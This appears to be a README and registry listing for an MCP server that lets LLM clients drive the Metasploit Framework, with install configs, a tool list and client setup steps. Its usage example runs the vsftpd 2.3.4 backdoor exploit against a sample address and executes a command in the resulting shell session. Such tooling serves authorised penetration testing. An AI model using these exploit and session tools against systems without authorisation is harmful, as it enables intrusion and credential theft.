MCP server for Metasploit Framework via pymetasploit3
MCP server for Metasploit Framework via pymetasploit3. This server exposes all pymetasploit3 functionality as MCP tools, allowing LLMs to interact with Metasploit Framework through the msfrpc protocol.
pip install mcp-pymetasploit3
{
"mcpServers": {
"mcp-pymetasploit3": {
"command": "mcp-pymetasploit3",
"env": {}
}
}
}
Before using the MCP server, you need to start the Metasploit RPC server:
Using msfrpcd:
msfrpcd -P yourpassword -p 55553 -n
Using msfconsole:
msfconsole -q
msf6 > load msgrpc Pass=yourpassword
Once connected, the following tools are available:
connect - Connect to Metasploit RPC serverdisconnect - Disconnect from RPC serverget_client_info - Get current connection statuslist_modules - List available modules by typeuse_module - Load a specific moduleget_module_info - Get module description and infoget_module_options - Get all module optionsset_module_option - Set a module optionget_missing_required - Get required options not setexecute_module - Execute a moduleget_module_targets - Get available targetsset_module_target - Set the targetget_target_payloads - Get compatible payloadsgenerate_payload - Generate a payloadlist_sessions - List all active sessionsget_session_info - Get session informationinteract_session - Write/read from sessionsession_run_command - Run command with outputstop_session - Stop a sessioncreate_console - Create a new consoledestroy_console - Destroy a consolewrite_console - Write to consoleread_console - Read console outputconsole_is_busy - Check if console is busyrun_module_output - Execute module and get outputget_framework_version - Get framework versioncore_save - Save core statecore_reload_modules - Reload modulescore_set_global - Set global variablecore_unset_global - Unset global variableget_db_status - Get database statusdb_list_workspaces - List workspacesdb_set_workspace - Set current workspacedb_list_hosts - List hostsdb_list_services - List servicesdb_list_notes - List notesdb_list_creds - List credentialsdb_list_vulns - List vulnerabilitieslist_jobs - List running jobsstop_job - Stop a jobget_job_info - Get job informationlist_plugins - List loaded pluginsload_plugin - Load a pluginunload_plugin - Unload a pluginsearch_modules - Search for modulesget_module_references - Get module references# Connect to Metasploit
connect(password="yourpassword", host="127.0.0.1", port=55553, ssl=False)
# List exploits
exploits = list_modules("exploit")
# Use an exploit
use_module("exploit", "unix/ftp/vsftpd_234_backdoor")
# Set options
set_module_option("exploit", "unix/ftp/vsftpd_234_backdoor", "RHOSTS", "192.168.1.100")
# Execute
result = execute_module("exploit", "unix/ftp/vsftpd_234_backdoor", payload="cmd/unix/interact")
# List sessions
sessions = list_sessions()
# Interact with session
output = interact_session("1", "whoami")
# Disconnect
disconnect()
git clone https://github.com/daedalus/mcp-pymetasploit3.git
cd mcp-pymetasploit3
pip install -e ".[test]"
# run tests
pytest
# format
ruff format src/ tests/
# lint
ruff check src/ tests/
# type check
mypy src/
mcp-name: io.github.daedalus/mcp-pymetasploit3
Source-derived launch command. Check the maintainer’s required arguments and credentials before running:
uvx mcp-pymetasploit3Merge this template into ~/Library/Application Support/Claude/claude_desktop_config.json. Keep existing servers. Add any arguments, credentials, and permissions required by the maintainer; this template has not been install-tested.
{
"mcpServers": {
"io-github-daedalus-mcp-pymetasploit3": {
"command": "uvx",
"args": [
"mcp-pymetasploit3"
]
}
}
}Restart Claude Desktop completely for changes to take effect. Confirm the server appears connected in the client’s tool list, then try a read-only example from its documentation.
Claude Desktop setup referencemcp-pymetasploit3pypiio.github.daedalus/mcp-pymetasploit3 works with any MCP-compatible client. Copy the config snippet from the Configuration section above and add it to the file shown for your client, then restart the application.
~/Library/Application Support/Claude/claude_desktop_config.jsonRestart Claude Desktop completely for changes to take effect.~/.cursor/mcp.jsonRestart Cursor for changes to take effect..vscode/mcp.jsonReload VS Code window for changes to take effect.~/.codeium/windsurf/mcp_config.jsonRestart Windsurf for changes to take effect..mcp.jsonSave at the project root, then start Claude Code in that project and review the MCP server approval prompt. Keep real credentials out of shared files.